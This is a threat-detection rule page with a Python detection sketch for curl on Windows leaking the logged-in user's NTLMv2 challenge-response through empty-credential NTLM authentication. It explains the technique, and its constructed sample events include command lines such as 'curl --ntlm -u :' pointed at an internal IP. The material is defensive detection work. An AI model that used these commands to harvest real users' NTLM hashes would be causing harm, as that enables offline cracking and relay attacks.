Rule Info
Name
NTLM Hash Leak Via Curl NTLM Authentication
Author
Swachchhanda Shrawan Poudel (Nextron Systems)
Description
Detects the use of curl with NTLM authentication (--ntlm) and empty credentials (-u :), which can be abused to leak the currently logged-in user's NTLMv2 challenge-response to an attacker-controlled server, enabling offline cracking or relay attacks.
When no credentials are provided, the Microsoft-shipped curl passes a NULL identity to Windows SSPI, which automatically falls back to the current user's logon session credentials held by LSASS, so no plaintext password is required.
This behavior requires a curl build with SSPI support, such as the curl binary Microsoft ships with Windows (since Windows 10 version 1803 / Windows Server 2019); a build without SSPI uses curl's own NTLM code, has no access to the logon session, and cannot leak it.
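The following is an added detection sketch, not the rule's own selection logic, that checks process-creation events for the pattern described above (curl.exe with --ntlm and an empty -u/--user credential). The event fields, the sample events and the exact regular expressions are assumptions; the samples are constructed, not real telemetry.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (Sysmon Event ID 1 / 4688 style).
# Only the first two should match: curl.exe, --ntlm, and an empty "user:pass".
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl --ntlm -u : http://10.0.0.5/share"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r'curl.exe --ntlm --user ":" -o out.bin http://10.0.0.5/x'},
    # explicit credentials: SSPI gets a real identity, no logon-session fallback
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl --ntlm -u alice:Secret1 http://intranet/"},
    # no NTLM at all
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -s https://example.com/"},
    # wrong binary
    {"Image": r"C:\Tools\wget.exe",
     "CommandLine": r"wget --ntlm -u : http://10.0.0.5/"},
]

# --ntlm as a standalone option (the lookahead excludes e.g. --ntlm-wb).
NTLM_FLAG = re.compile(r"(?:^|\s)--ntlm(?=\s|$)")

# -u / --user followed by an empty "user:password" pair. Accepts the forms
# "-u :", "-u:", "--user=:" and a quoted ":" ("-u \":\""); the backreference
# keeps the opening and closing quote consistent. "-u alice:x" does not match.
EMPTY_CREDS = re.compile(r"""(?:^|\s)(?:-u|--user)(?:\s+|=)?(["']?):\1(?=\s|$)""")


def is_curl_image(image: str) -> bool:
    """Match on the image name rather than a full path; Windows paths are case-insensitive."""
    return image.lower().endswith("\\curl.exe")


def is_ntlm_empty_cred_leak(event: Dict[str, str]) -> bool:
    """True when the event shows curl.exe doing NTLM auth with an empty credential."""
    cmd = event.get("CommandLine", "")
    return (
        is_curl_image(event.get("Image", ""))
        and NTLM_FLAG.search(cmd) is not None
        and EMPTY_CREDS.search(cmd) is not None
    )


def detect(events: List[Dict[str, str]]) -> List[str]:
    """Return the command lines of all matching events, in input order."""
    return [e["CommandLine"] for e in events if is_ntlm_empty_cred_leak(e)]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

On a suspect host, `curl.exe -V` listing `SSPI` among its Features confirms the build that exhibits the fallback. Renamed copies of curl.exe will evade the image check, so pairing it with an OriginalFileName or hash-based check is advisable where the telemetry provides one.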
Date
2026-06-04 00:00:00
Modified
None
Id
916eb839-895e-47f8-99ee-3008bf377a3e
Tags
attack.credential-access attack.t1187
Type
Community Rule
Link to Public Repo
Rule History
Author
Swachchhanda Shrawan Poudel
Title
Merge PR #6049 from @swachchhanda000 - Add `NTLM Hash Leak Via Curl NTLM Authentication`
Date
2026-06-11
Commit
